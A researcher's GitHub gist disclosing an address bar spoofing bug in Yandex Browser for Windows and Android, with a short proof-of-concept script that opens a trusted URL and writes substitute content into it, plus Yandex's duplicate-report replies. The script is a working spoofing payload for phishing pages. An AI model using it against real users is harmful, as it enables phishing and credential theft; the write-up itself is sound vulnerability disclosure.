Skip to content

Instantly share code, notes, and snippets.

@jimen0

jimen0/Address Bar Spoofing - Yandex Browser [Windows & Android].md Secret

Last active July 22, 2016 18:15
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jimen0/82dc027455c3b2a6e6c8110a5268b04d to your computer and use it in GitHub Desktop.
Save jimen0/82dc027455c3b2a6e6c8110a5268b04d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
Address Bar Spoofing - Yandex Browser [Windows & Android].md

Yandex Browser - Address Bar Spoofing

Disclaimer: both vulnerabilities were reported to the Yandex Security Team and considered as dupes, so, I was not the first one who discovered them.

Yandex Browser for Windows

This issue was reported 19th July, 2016, 21:36

By making an user visit a page controlled by the attacker and using window.open and document.write functions, it was possible to spoof the URL that is shown.

Workflow:

  • Once the page loads, a function is triggered. In my PoC, the function was triggered when a button is clicked.
  • The function opens a new window by using window.open pointing to the URL that is going to be spoofed.
  • By calling to document.write to that new window, we write a script that calls again to document.write and writes the content, usually this content will be a phising login panel. - My PoC used document.location in order to help them to know the real location insted of the one that the Address Bar was showing.

So, the final code would be:

<script>
function spoof() {
        nWindow = window.open('https:/www.google.com', '_t1');
        nWindow.document.write('<pre>Here we could place a phising login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
The page is being hosted in my server

Result

Final email about this vulnerability was:
Hello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.

Have a nice day!
--
Vasiliy Kuznetsov Yandex Security Team

Yandex Browser for Android

This issue was reported 19th July, 2016, 18:41

The workflow is exactly the same again.

Before running the PoC:


![ResultMobile1](http://i.imgur.com/jDPQ1mp.jpg)

After running the PoC:


![ResultMobile2](http://i.imgur.com/yOQKHwH.jpg)

Final emails about this vulnerability were:
Hello, Miguel Ángel!

As for Android, I'll check it shortly because it look similar to one report we got the other day. I'll let you know in a few days.

Have a great weekend!

Hello, Miguel Ángel!

I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.

I hope you've enjoyed this write up.

If you're the one who reported this vulnerabilities before me and you want me to remove this post, please, send me a message via Twitter

Kind regards!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment